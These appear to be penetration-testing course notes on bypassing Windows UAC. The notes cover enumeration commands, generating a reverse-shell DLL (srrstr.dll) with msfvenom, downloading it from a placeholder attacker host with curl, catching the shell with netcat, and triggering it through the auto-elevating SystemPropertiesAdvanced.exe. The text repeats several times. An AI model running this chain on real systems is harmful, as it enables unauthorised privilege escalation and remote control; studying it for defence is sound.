14.User-account-control

whoami command to check current user information

whoami /user

List members of the administrators group

net localgroup administrators

Display the privileges of the current user

whoami /priv

Query registry to check if UAC is enabled

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

Get the OS version using PowerShell

[environment]::OSVersion.Version

Print the PATH environment variable

cmd /c echo %PATH%

List tasks and filter for rundll32 processes

# Useful to identify suspicious rundll32 usage
tasklist /svc | findstr "rundll32"

Kill a process by specifying its PID

# Replace <pid> with the actual process ID
taskkill /PID <pid> /F

Generate a reverse TCP shell DLL using msfvenom

# Replace <attacker_ip> and <attacker_port> with actual values
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f dll > srrstr.dll

Start a Python HTTP server to host the DLL payload

python3 -m http.server <port>

Download the DLL file from the attacker's server using curl

curl http://<attacker_ip>:<port>/srrstr.dll -O "C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll"

Set up Netcat listener to capture the reverse shell

nc -lvnp <attacker_port>

Execute the DLL payload using rundll32

rundll32 shell32.dll,Control_RunDLL C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll

Open advanced system properties dialog

C:\\Windows\\SysWOW64\\SystemPropertiesAdvanced.exe

Confirm the current user after potential privilege escalation

whoami

Key Concepts:

UAC Functionality:
- UAC prompts for elevation when applications require administrator privileges.
- It separates standard user and administrator tokens.
- It is a security convenience, not a security boundary.
UAC Bypass:
- Leveraging vulnerabilities or unintended behavior in Windows binaries.
- DLL hijacking is a common technique.
- SystemPropertiesAdvanced.exe is a auto elevating binary.
DLL Hijacking:
- Placing a malicious DLL in a directory where a trusted binary searches for it.
- Windows DLL search order is critical.

Approach, Commands, Tools, and Techniques:

UAC and User Information Gathering:
- whoami /user (Check current user).
- net localgroup administrators (Verify admin group membership).
- whoami /priv (Review user privileges).
- REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA (Check if UAC is enabled).
- REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin (Check UAC level).
- [environment]::OSVersion.Version (PowerShell: Check Windows version).
- cmd /c echo %PATH% (Review PATH environment variable).
- tasklist /svc | findstr "rundll32" (List running rundll32 processes).
- taskkill /PID <pid> /F (Kill rundll32 processes).
Malicious DLL Generation and Transfer:
- msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f dll > srrstr.dll (Generate malicious DLL).
- python3 -m http.server <port> (Start HTTP server).
- curl http://<attacker_ip>:<port>/srrstr.dll -O "C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll" (Download DLL).
Listener Setup:
- nc -lvnp <attacker_port> (Start Netcat listener).
Testing and Exploitation:
- rundll32 shell32.dll,Control_RunDLL C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll (Test DLL execution).
- C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe (Execute vulnerable binary).
Verification:
- whoami (Verify elevated privileges).
- whoami /priv (Verify elevated privileges).

Commands:

whoami
net localgroup administrators
REG QUERY
cmd /c echo %PATH%
tasklist
taskkill
msfvenom
python3 -m http.server
curl
nc
rundll32

Tools:

msfvenom (Metasploit)
nc (Netcat)

Techniques:

UAC bypass.
DLL hijacking.
Exploiting auto-elevating binaries.

Key Considerations:

Windows version and build number are critical for UAC bypass selection.
DLL search order.
Attacker controlled IP addresses and Ports.
Process cleanup.

Previous4.Attacking the OS Next15.Weak-permissions

Last updated 12 days ago

14.User-account-control

whoami command to check current user information

whoami /user

List members of the administrators group

net localgroup administrators

Display the privileges of the current user

whoami /priv

Query registry to check if UAC is enabled

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

Get the OS version using PowerShell

[environment]::OSVersion.Version

Print the PATH environment variable

cmd /c echo %PATH%

List tasks and filter for rundll32 processes

# Useful to identify suspicious rundll32 usage
tasklist /svc | findstr "rundll32"

Kill a process by specifying its PID

# Replace <pid> with the actual process ID
taskkill /PID <pid> /F

Generate a reverse TCP shell DLL using msfvenom

# Replace <attacker_ip> and <attacker_port> with actual values
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f dll > srrstr.dll

Start a Python HTTP server to host the DLL payload

python3 -m http.server <port>

Download the DLL file from the attacker's server using curl

curl http://<attacker_ip>:<port>/srrstr.dll -O "C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll"

Set up Netcat listener to capture the reverse shell

nc -lvnp <attacker_port>

Execute the DLL payload using rundll32

rundll32 shell32.dll,Control_RunDLL C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll

Open advanced system properties dialog

C:\\Windows\\SysWOW64\\SystemPropertiesAdvanced.exe

Confirm the current user after potential privilege escalation

whoami

Key Concepts:

UAC Functionality:
- UAC prompts for elevation when applications require administrator privileges.
- It separates standard user and administrator tokens.
- It is a security convenience, not a security boundary.
UAC Bypass:
- Leveraging vulnerabilities or unintended behavior in Windows binaries.
- DLL hijacking is a common technique.
- SystemPropertiesAdvanced.exe is a auto elevating binary.
DLL Hijacking:
- Placing a malicious DLL in a directory where a trusted binary searches for it.
- Windows DLL search order is critical.

Approach, Commands, Tools, and Techniques:

UAC and User Information Gathering:
- whoami /user (Check current user).
- net localgroup administrators (Verify admin group membership).
- whoami /priv (Review user privileges).
- REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA (Check if UAC is enabled).
- REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin (Check UAC level).
- [environment]::OSVersion.Version (PowerShell: Check Windows version).
- cmd /c echo %PATH% (Review PATH environment variable).
- tasklist /svc | findstr "rundll32" (List running rundll32 processes).
- taskkill /PID <pid> /F (Kill rundll32 processes).
Malicious DLL Generation and Transfer:
- msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f dll > srrstr.dll (Generate malicious DLL).
- python3 -m http.server <port> (Start HTTP server).
- curl http://<attacker_ip>:<port>/srrstr.dll -O "C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll" (Download DLL).
Listener Setup:
- nc -lvnp <attacker_port> (Start Netcat listener).
Testing and Exploitation:
- rundll32 shell32.dll,Control_RunDLL C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll (Test DLL execution).
- C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe (Execute vulnerable binary).
Verification:
- whoami (Verify elevated privileges).
- whoami /priv (Verify elevated privileges).

Commands:

whoami
net localgroup administrators
REG QUERY
cmd /c echo %PATH%
tasklist
taskkill
msfvenom
python3 -m http.server
curl
nc
rundll32

Tools:

msfvenom (Metasploit)
nc (Netcat)

Techniques:

UAC bypass.
DLL hijacking.
Exploiting auto-elevating binaries.

Key Considerations:

Windows version and build number are critical for UAC bypass selection.
DLL search order.
Attacker controlled IP addresses and Ports.
Process cleanup.

Previous4.Attacking the OS Next15.Weak-permissions

Last updated 12 days ago

whoami command to check current user information

List members of the administrators group

Display the privileges of the current user

Query registry to check if UAC is enabled

Query registry for administrator consent prompt behavior

Get the OS version using PowerShell

Print the PATH environment variable

List tasks and filter for rundll32 processes

Kill a process by specifying its PID

Generate a reverse TCP shell DLL using msfvenom

Start a Python HTTP server to host the DLL payload

Download the DLL file from the attacker's server using curl

Set up Netcat listener to capture the reverse shell

Execute the DLL payload using rundll32

Open advanced system properties dialog

Confirm the current user after potential privilege escalation

Key Concepts:

whoami command to check current user information

List members of the administrators group

Display the privileges of the current user

Query registry to check if UAC is enabled

Query registry for administrator consent prompt behavior

Get the OS version using PowerShell

Print the PATH environment variable

List tasks and filter for rundll32 processes

Kill a process by specifying its PID

Generate a reverse TCP shell DLL using msfvenom

Start a Python HTTP server to host the DLL payload

Download the DLL file from the attacker's server using curl

Set up Netcat listener to capture the reverse shell

Execute the DLL payload using rundll32

Open advanced system properties dialog

Confirm the current user after potential privilege escalation

Key Concepts: